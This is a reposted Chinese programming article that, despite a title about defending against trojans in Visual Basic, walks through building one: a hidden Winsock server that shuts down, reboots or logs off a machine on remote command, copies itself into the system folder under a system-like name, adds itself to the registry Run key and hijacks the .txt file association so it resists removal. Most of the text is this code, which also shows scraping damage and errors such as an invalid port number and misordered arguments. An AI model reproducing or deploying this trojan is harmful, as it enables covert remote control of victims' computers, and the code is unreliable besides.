利用VisualBasic防范木馬類攻擊

2019-11-18 17:28:42

字體：大中小

來源：轉載

供稿：網友

首先，新建一工程，名為Server，新建一個窗體，Name為Server，在窗體中加入一個winsock控件，Name設為sckServer，協議設為默認的TCP／ip協議。

　　接下來我們回來Server窗體模塊中，添加如下代碼：

->PRivateSubform_Load()
　WithMe
　　.sckServer.LocalPort=88917'本地端口（呵呵！我的生日?。?br />　　.sckServer.Listen'開始監聽
　EndWith
EndSub

'接受客戶端的連接請求。

PrivateSubsckServer_ConnectionRequest(ByValrequestIDAsLong)
　WithMe
　　If.sckServer.State<>sckClosedThen.sckServer.Close
　　.sckServer.Accept(requestID)
　EndWith
EndSub->

　　下面我們來建立客戶端程序：新建一個工程，名為Client，把窗體名為Client，在上面加入一個winsock控件，名為sckClient，協議為TCP／IP協議。再加一個按鈕cmdConnect在窗體模塊中加入代碼：

->PrivateSubform_Load()
　WithMe
　　.sckClient.RemoteHost="127.0.0.1"'設置遠程IP，本例設為本機。
　　.sckClient.RemotePort=88917'遠程端口,就為server中的設置一樣.
　EndWith
EndSub

PrivatesubcmdConnect_Click()
　SckClient.Connect
Endsub->

　　至此，單擊Connect按鈕我們的兩個工程已經可以進行通信了，但看不見，你可以在Client中的sckClient_Connect事件中加入代碼：debug.print“Connetionsuccessful!”來查看。

　　這僅是第一步，一點工作也做不了，下面我們來為它們添加功能。為了簡單，本文章只實現一點小小的功能―――關機，重啟，注銷。好，開始吧！

　　在Server工程中新建一個模塊，Name為modApi，這個?？鞛橐恍〢PI函數，添加如下API函數：

->PublicDeclareFunctionExitWindowXXXLib"user32"Alias"ExitWindowXXX"(ByValuFlagsAsLong,ByValdwReservedAsLong)AsLong

PublicConstEWX_LOGOFF=0
PublicConstEWX_REBOOT=2
PublicConstEWX_SHUTDOWN=1
PublicDeclareFunctionClipCursorLib"user32"Alias"ClipCursor"(lpRectAsAny)AsLong

PublicTypeRECT
　LeftAsLong
　TopAsLong
　RightAsLong
　BottomAsLong
EndType->

　　注：在兩個socket中編程中，進行通信的重要事件是DataArrival事件，用于接收遠程數據。

　　下面在Client工程的Client窗體中放入三個按鈕，分別為cmdExit,cmdLogoff,cmdReboot。它們用于對遠程的關機，注銷，重啟操作。分別添加如下代碼：

->PrivateSubcmdExit_Click()
　Me.sckClient.SendData"Exit"
EndSub

PrivateSubcmdLogoff_Click()
　Me.sckClient.SendData"Logoff"
EndSub

PrivateSubcmdReboot_Click()
　Me.sckClient.SendData"Reboot"
EndSub->

　　全都是對服務端發出請求。下面轉到Server工程中：在Server中添加sckServer的DataArrial事件，接收客戶端的請求。

->PrivateSubsckServer_DataArrival(ByValbytesTotalAsLong)
　DimstrDataAsString
　WithMe
　　'接收客戶請求的信息
　　.sckServer.GetDatastrData
　　SelectCasestrData
　　　Case"Exit"
　　　　'關機
　　　　CallExitWindowXXX(EWX_SHUTDOWN,0)
　　　Case"Reboot"
　　　　'重啟
　　　　CallExitWindowXXX(EWX_REBOOT,0)
　　　Case"Logoff"
　　　　'注銷
　　　CallExitWindowXXX(EWX_LOGOFF,0)
　　EndSelect
　EndWith

EndSub->

　　好了,到此我們已經實現功能了，但還不行，我們要它在背后運行。這簡單，在Server中的form_Load事件中加入一句：me.hide。好這下看不見了，但大家知道木馬是一開機就自動運行了，這又是為什么，怎么實現的？把它加入到注冊表的啟動組中？對，不錯，跟我來吧！

　　回到Server工程中的modApi中加入如下API函數：

->PublicDeclareFunctionRegOpenKeyLib"advapi32.dll"Alias"RegOpenKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong

PublicDeclareFunctionRegSetvalueExLib"advapi32.dll"Alias"RegSetvalueExA"(ByValhKeyAsLong,ByVallpvalueNameAsString,ByValReservedAsLong,ByValdwTypeAsLong,lpDataAsAny,ByValcbDataAsLong)AsLong

PublicDeclareFunctionRegCreateKeyLib"advapi32.dll"Alias"RegCreateKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicConstREG_BINARY=3

PublicConstREG_SZ=1

PublicConstHKEY_LOCAL_MACHINE=&H80000002

PublicConstHKEY_CLASSES_ROOT=&H80000000->

　　寫到注冊表啟動組中的過程。

->PublicSubStartupGroup()

　DimsKeyAsString
　DimresultAsLong
　DimhKeyIDAsLong
　DimsKeyValAsString

　sKey="Systrsy"'啟動組中的鍵,找一個與系統文件相近的。
　sKeyVal="C:/windows/system/systrsy.exe"'木馬文件的路徑，可以用GetSystemDirectory來取得系統路徑。
　result=RegOpenKey(HKEY_LOCAL_MACHINE,_
　　　"Software/Microsoft/Windows/CurrentVersion/Run",hKeyID)
　Ifresult=0Then
　　result=RegSetvalueEx(hKeyID,sKey,0&,REG_SZ,sKeyVal,Len(sKey) 1)
　EndIf
EndSub->

　　好，就這樣簡單地完成了。但是，想過沒有，如果不是很菜的鳥，到注冊表中見一刪，我們苦苦的心血不就白白地浪費了嗎？不行，還得想讓他發現了刪也刪不掉。請看下面的代碼：

->PublicSubWriteToTxt()

　DimresultAsLong
　DimhKeyIDAsLong
　DimskeyAsString
　DimskeyValAsString

　skey="txtfile/shell/open/command"
　skeyVal="C:/windows/system/txtView.exe"
　result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)

　Ifresult=0Then
　　result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal) 1)
　EndIf
EndSub->

　　肯定不少朋友一看就知道了，原是與txt文件進行關聯，一點也不錯，但C:/windows/system/txtView.exe是哪里來的，我們的木馬是C:/windows/system/systrsy.exe呀。這可是我們木馬的分身了。

　　好，回到Server工程的Server窗體的form_Load中，加入如下代碼：

->DimsCurrentPathAsString,sSystemDirAsString
sCurrentPath=App.Path&"/"&App.EXEName&".exe"
sSystemDir=“C:/windows/system”
OnErrorResumeNext

　'復制文件成系統目錄下的Systrsy.exe
　FileCopysCurrentPath,sSystemDir&"/Systrsy.exe"
OnErrorResumeNext

復制文件成系統目錄下的txtView.exe

FileCopysCurrentPath,sSystemDir&"/txtView.exe"->

　　調用

->CallstartupGroup
CallWriteToTxt

'判斷程序是否下在運行

IfApp.PrevInstanceThen
　'如果已經運行就退出。
End

EndIf->

　　注意：

　　1、大家在處理端口是最好使用高端端口，否則會和一些常用端口發生沖突

　　2、在第一次使用VB.NET的最好看看有關的圖書
->

以上就是如何利用VisualBasic防范木馬類攻擊，希望大家知己知彼，防范于未然！

上一篇：在VisualBasic中終止Windows95

下一篇：用VisualBasic也可以實現P2P